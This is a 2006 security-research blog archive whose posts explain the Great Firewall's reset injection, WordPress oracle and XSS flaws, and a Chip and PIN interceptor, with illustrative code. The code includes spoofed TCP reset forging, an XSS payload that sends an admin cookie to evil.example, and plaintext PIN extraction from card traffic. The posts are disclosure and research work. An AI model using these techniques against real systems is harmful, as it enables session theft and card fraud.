Monthly Archives: June 2006

Permissive action links for individual bullets

I read with interest about US Patent application 20060117632, which proposes to apply the notion of cryptographic accessory control to individual bullets in firearms. Only after an authentication protocol has convinced the tiny microprocessor in a cartridge that it is OK to potentially kill someone will it close a transistor switch that normally blocks the electrical ignition mechanism.
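
The application does not pin down a concrete protocol, but something along the lines of the following challenge-response sketch would fit the description. This is purely our own illustration, assuming a shared HMAC key between the cartridge and whatever device sits at the end of the authorisation chain; all the names here are hypothetical.

```python
import hmac, hashlib, os

def authoriser_response(key: bytes, challenge: bytes) -> bytes:
    # Runs in the firearm (or further up the authorisation chain):
    # prove knowledge of the shared key for this particular challenge.
    return hmac.new(key, challenge, hashlib.sha256).digest()

def cartridge_should_fire(key: bytes) -> bool:
    # Runs in the cartridge's microprocessor. Only if the response
    # verifies does the chip close the transistor switch that normally
    # blocks the electrical ignition circuit.
    challenge = os.urandom(16)  # fresh nonce, so old responses cannot be replayed
    response = authoriser_response(key, challenge)
    expected = hmac.new(key, challenge, hashlib.sha256).digest()
    return hmac.compare_digest(response, expected)
```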

It does not seem to me technically infeasible, or even cost-prohibitive, to apply security mechanisms comparable to those we have come to expect in weapons of mass destruction to smaller weapon systems designed to kill only a few people at a time.

(The idea could be extended. If we add a chip to each cartridge, we might as well place it into the bullet itself. The bullet processor could then store in its NVRAM an audit log of the certification chain that ultimately authorized the firing of this bullet. With the right packaging, NVRAM chips can be made extremely tough and withstand hundreds of km/s² acceleration, much more than the conditions a normal bullet faces when penetrating a body. Having a log file in each bullet that identifies who is responsible for firing it could make the forensic investigation of shootings and war crimes so much easier.)

Ignoring the "Great Firewall of China"

The Great Firewall of China is an important tool for the Chinese Government in their efforts to censor the Internet. It works, in part, by inspecting web traffic to determine whether or not particular words are present. If the Chinese Government does not approve of one of the words in a web page (or a web request), perhaps it says “f” “a” “l” “u” “n”, then the connection is closed and the web page will be unavailable — it has been censored.

This user-level effect has been known for some time… but up until now, no-one seems to have looked more closely into what is actually happening (or when they have, they have misunderstood the packet level events).

It turns out [caveat: in the specific cases we’ve closely examined, YMMV] that the keyword detection is not actually being done in the large routers on the borders of the Chinese networks, but in nearby subsidiary machines. When these machines detect a keyword, they do not actually prevent the packet containing it from passing through the main router (this would be horribly complicated to achieve while still allowing the router to run at the necessary speed). Instead, the subsidiary machines generate a series of TCP reset packets, which are sent to each end of the connection. When the resets arrive, the endpoints assume they are genuine requests from the other end to close the connection — and obey. Hence the censorship occurs.
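
To make the mechanism concrete, here is a rough sketch of what the subsidiary machine appears to do when its keyword matcher fires on a packet. This is our own illustration in Python/scapy, not code recovered from the firewall:

```python
from scapy.all import IP, TCP, send

def inject_resets(pkt):
    # pkt is the offending data packet; it is not dropped. Instead,
    # forged RSTs are sent to both endpoints, each spoofed as the peer.
    ip, tcp = pkt[IP], pkt[TCP]
    # Reset towards the server, pretending to come from the client:
    send(IP(src=ip.src, dst=ip.dst) /
         TCP(sport=tcp.sport, dport=tcp.dport, flags="R", seq=tcp.seq))
    # Reset towards the client, pretending to come from the server:
    send(IP(src=ip.dst, dst=ip.src) /
         TCP(sport=tcp.dport, dport=tcp.sport, flags="R", seq=tcp.ack))
```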

However, because the original packets pass through the firewall unscathed, if both endpoints were to completely ignore the firewall’s reset packets, then the connection would proceed unhindered! We’ve done some real experiments on this — and it works just fine! Think of it as the Harry Potter approach to the Great Firewall — just shut your eyes and walk onto Platform 9¾.

Ignoring resets is trivial to achieve by applying simple firewall rules… and has no significant effect on ordinary working. If you want to be a little more clever, you can examine the hop count (TTL) in the reset packets and determine whether the values are consistent with their arriving from the far end, or whether the value indicates they have come from the intervening censorship device. We would argue that there is much to commend examining TTL values when considering defences against denial-of-service attacks that use reset packets. Having operating system vendors provide this new functionality as standard would also be of practical use, because Chinese citizens would not need to run special firewall-busting code (which the authorities might attempt to outlaw) but just off-the-shelf software (which the authorities would have to tolerate).
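
In its crudest form, ignoring resets is a one-line packet filter rule (on Linux, something like iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP, though dropping every reset is rather blunt). The TTL heuristic might look like the following sketch, which again is our own illustration rather than code from the paper: learn the hop count of ordinary traffic from the peer, and treat resets whose TTL is inconsistent with that baseline as suspect.

```python
from scapy.all import sniff, IP, TCP

peer_ttl = {}  # baseline TTL per flow, learned from ordinary (non-RST) packets

def classify(pkt):
    if IP not in pkt or TCP not in pkt:
        return
    flow = (pkt[IP].src, pkt[TCP].sport, pkt[IP].dst, pkt[TCP].dport)
    if pkt[TCP].flags & 0x04:  # RST bit set
        expected = peer_ttl.get(flow)
        if expected is not None and abs(pkt[IP].ttl - expected) > 2:
            # Hop count inconsistent with the real peer: probably injected
            # by an in-path device, so a defending stack could ignore it.
            print("suspicious RST on", flow, "TTL", pkt[IP].ttl)
    else:
        peer_ttl[flow] = pkt[IP].ttl

sniff(filter="tcp", prn=classify, store=False)
```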

There’s a little more to this story (but not much) and all is revealed in our academic paper (Clayton, Murdoch, Watson) which will be presented at the 6th Workshop on Privacy Enhancing Technologies being held here in Cambridge this week.

NB: There’s also rather more to censorship in China than just the “Great Firewall” keyword detecting system — some sites are blocked unconditionally, and it is necessary to use other techniques, such as proxies, to deal with that. However, these static blocks are far more expensive for the Chinese Government to maintain, and are inherently more fragile and less adaptive to change as content moves around. So there remains real value in exposing the inadequacy of the generic system.

The bottom line, though, is that a great deal of the effectiveness of the Great Chinese Firewall depends on systems agreeing that it should work… wasn’t there once a story about the Emperor’s New Clothes?

Oracle attack on WordPress

This post describes the second of two vulnerabilities I found in WordPress. The first, an XSS vulnerability, was described last week. While the vulnerability discussed here is applicable in fewer cases than the previous one, it is an example of a comparatively rare class, oracle attacks, so I think it merits further exposition.

An oracle attack is one where an attacker can abuse a facility provided by a system to gain unauthorized access to protected information. The term originates from cryptology, and such attacks still crop up regularly, for example in banking security devices and protocols. The occurrence of an oracle attack in WordPress illustrates the need for a better understanding of cryptography, even by the authors of applications not conventionally considered to be cryptographic software. More forgiving primitives and better robustness principles could also reduce the risk of future weaknesses.

The vulnerability is a variant of the ‘cache’ shell injection bug reported by rgodm. It is caused by an unfortunate series of design choices by the WordPress team, leading to arbitrary PHP execution. The WordPress cache stores commonly accessed information from the database, such as user profile data, in files for faster retrieval. Despite being needed only by the server, these files are still accessible from the web, which is commonly considered bad practice. To prevent their content being read remotely, the data is placed in .php files, commented out with //. Thus, when executed by the web server in response to a remote query, they return an empty page.

However, putting user-controlled data in executable files is inherently a risky choice. If the attacker can escape from the comment, then arbitrary PHP can be executed. rgodm’s shell injection bug does this by inserting a newline into the display name. Now all the attacker must do is guess the name of the .php file which stores his cached profile information, and invoke it to run the injected PHP. WordPress puts an index.php in the cache directory to suppress directory indexing, and filenames are generated as MD5(username || DB_PASSWORD) || “.php”, which creates a hard-to-guess name. The original bug report suggested brute-forcing DB_PASSWORD, the MySQL authentication password, but the oracle attack described here will succeed even if a strong password is chosen.
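
For concreteness, the naming scheme amounts to the following (a Python transcription of the logic described above, with names of our own choosing; DB_PASSWORD is the MySQL password from wp-config.php):

```python
import hashlib

def cache_filename(username: str, db_password: str) -> str:
    # The cache file name is bound to the database password, so guessing
    # it should be as hard as guessing the password itself...
    return hashlib.md5((username + db_password).encode()).hexdigest() + ".php"

# ...unless some feature of the application acts as an oracle and leaks
# the digest, which is exactly what the attack described here exploits.
print(cache_filename("admin", "hunter2"))  # a 32-hex-digit name ending in .php
```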

Continue reading Oracle attack on WordPress

Censoring science

I’ve written a rebuttal in today’s Guardian to an article that appeared last week by Martin Rees, the President of the Royal Society. Martin argued that science should be subjected to more surveillance and control in case terrorists do bad things with it.

Those of us who work with cryptography and computer security have been subjected to a lot of attempts by governments to restrict what we do and publish. It’s a long-running debate: the first book written on cryptology in English, by Bishop John Wilkins in 1641, remarked that ‘If all those useful Inventions that are liable to abuse, should therefore be concealed, there is not any Art or Science which might be lawfully profest’. (John, like Martin, was Master of Trinity in his day.)

In 2001–2, the government put an export control act through Parliament which, in its original form, would have required scientists working on subjects with possible military applications (that is, most subjects) to get export licences before talking to foreigners about their work. FIPR colleagues and I opposed this; we organised Universities UK, the AUT, the Royal Society, the Conservatives and the Liberals to bring in an amendment in the Lords creating a research exemption for scientists. We mustn’t lose that. If scientists end up labouring under the same bureaucratic controls as companies that sell guns, then both science and nonproliferation will be seriously weakened.

Some people love to worry: Martin wrote a whole book wondering about how the human race will end. But maybe we should rather worry about something a bit closer to hand — how our civilisation will end. If a society turns inwards and builds walls to keep the barbarians out, then competition abates, momentum gets lost, confidence seeps away, and eventually the barbarians win. Imperial Rome, Ming Dynasty China…?

Anatomy of an XSS exploit

Last week I promised to follow up on a few XSS bugs that I found in WordPress. The vulnerabilities are fixed in WordPress 2.0.3, even though the release notes do not mention their existence. I think there are a number of useful lessons to be drawn from them, so in this post I will describe them in more detail.

The goal of a classic XSS exploit is to run arbitrary Javascript, in the context of another webpage, which retrieves the user’s cookies. With WordPress I will concentrate on the comment management interface. Here, the deletion button has a Javascript onclick event handler that displays a confirmation dialog, which includes the comment author’s name. If malicious input can break out of the dialog box text, then when an administrator activates the button, the attacker’s Javascript runs, giving access to the admin user’s cookies. I found two classes of bugs which allowed me to do this.
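
To illustrate the pattern, here is a schematic of our own (rendered in Python for brevity, though WordPress itself is PHP) of a template that splices the author’s name into the handler without escaping:

```python
def delete_button(author: str) -> str:
    # Vulnerable: the author's name crosses from the HTML context into a
    # Javascript string literal without being escaped for either.
    return ('<input type="button" value="Delete" onclick="'
            "return confirm('Delete comment by " + author + "?');\">")

# An author name like this never leaves the onclick attribute, but breaks
# out of the Javascript string literal; clicking Delete then evaluates the
# attacker's expression, shipping the admin's cookie to the attacker.
evil = "x'+(document.location='http://evil.example/?c='+document.cookie)+'"
print(delete_button(evil))
```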

Continue reading Anatomy of an XSS exploit

Chip and skim 2

The 12:30 ITN news on ITV1 today featured a segment (video) on Chip and PIN, which should also be shown at 19:00 and 22:30. It included an interview with Ross Anderson and some shots of me presenting our Chip and PIN interceptor. The demonstration was similar to the one shown on German TV, but this time we went all the way, borrowing a magstripe writer and producing a fake card. This was used by the reporter to successfully withdraw money from an ATM (from his own account).

More details on how the device actually works are on our interceptor page. The key vulnerabilities present in the UK Chip and PIN cards we have tested, which the interceptor relies on, are:

  • The entered PIN is sent from the terminal to the card in unencrypted form (decoded in the sketch after this list)
  • It is still possible to use magstripe-only cards to withdraw cash, with the same PIN used in shops
  • All the details necessary to create a valid magstripe are also present on the chip
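
To see why the first point matters, here is a short sketch (our own, based on the standard EMV plaintext PIN-block format) showing how anything wiretapping the terminal-card interface can read the PIN straight out of the VERIFY command:

```python
def pin_from_verify_apdu(apdu: bytes) -> str:
    # EMV VERIFY header: CLA=00, INS=20, P1=00, P2=80 (plaintext PIN), Lc.
    cla, ins, p1, p2, lc = apdu[:5]
    assert ins == 0x20 and p2 == 0x80, "not a plaintext VERIFY command"
    block = apdu[5:5 + lc]
    assert block[0] >> 4 == 0x2, "not a plaintext PIN block"
    pin_len = block[0] & 0x0F                 # low nibble: number of PIN digits
    digits = "".join("%02x" % b for b in block[1:])
    return digits[:pin_len]                   # the remaining nibbles are F padding

# PIN 1234 exactly as it crosses the terminal-card interface:
print(pin_from_verify_apdu(bytes.fromhex("0020008008241234FFFFFFFFFF")))  # 1234
```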

This means that a crook could insert a miniaturised version of the interceptor into the card slot of a Chip and PIN terminal, without interfering with the tamper detection. The details it collects include the PIN and enough information to create a valid magstripe. The fake card can then be used in ATMs that are willing to accept cards which, from their perspective, have a damaged chip — a mode known as “fallback”. Some ATMs might not be able to read the chip at all, particularly ones abroad.

The fact that the chip also includes the magstripe details is not strictly necessary, since a skimmer could also read this directly, but the design of some Chip and PIN terminals, which only cover the chip, makes this difficult. One of the complaints against the terminals used in the Shell fraud was that they make it impossible to read the chip without reading the magstripe too. This led to suggestions that customers should not use such terminals, or even that they wipe their card’s magstripe to prevent skimmers from reading it.

While it is possible that the Shell fraudsters did read the magstripe, wiping it is no defence against them reading the communication between terminal and chip, which includes all the needed details. Even the CVV1, the code used to verify that a magstripe is valid, is on the chip (but not the CVV2, which is the 3-digit code printed on the back, used for e-commerce). This was presumably a backwards-compatibility measure, as was magstripe fallback. As shown by countless examples before, such features are frequently the source of security flaws.

The Rising Tide: DDoS by Defective Designs and Defaults

Dedicated readers will recall my article about how I tracked down the “DDoS” attack on stratum 1 time servers by various D-Link devices. I’ve now had a paper accepted at the 2nd Workshop on Steps to Reducing Unwanted Traffic on the Internet (SRUTI’06) which runs in California in early July.

The paper (PDF version available here and HTML here) gives rather more details about the problems with the D-Link firmware. More significantly, it puts this incident into context as one of a number of problems suffered by stratum 1 time servers over the past few years AND shows that these time server problems are just one example of a number of incidents involving different types of system that have been “attacked” by defective designs or poorly chosen defaults.

My paper is fairly gloomy about the prospects for improvement. ISPs are unlikely to be interested in terminating customers who are running “reputable” systems which just happen to contribute to a DDoS on some remote system. There’s no evidence that system designers are learning from past mistakes — and the deskilling of program development means that ever more clueless people are involved. Economic and legal approaches don’t seem especially promising — it may have cost D-Link (and Netgear before them) real dollars, but I doubt that the cost has been high enough yet to scare other companies into auditing their systems before they too cause a similar problem.

As to the title… I suggest that if a classic, zombie-originated, DDoS attack is like directing a firehose onto a system; and if a “flash crowd” (or “slashdotting”) is like a flash flood; then the sort of “attack” that I describe is like a steadily rising tide, initially easy to ignore and not very significant, but it can still drown you just the same.

Hence it’s important to make sure that your security approach — be it dams and dikes, swimming costumes and life-jackets, or wetsuits and scuba gear (or of course their Internet anti-DDoS equivalents) — is suitable for dealing with all of these threats.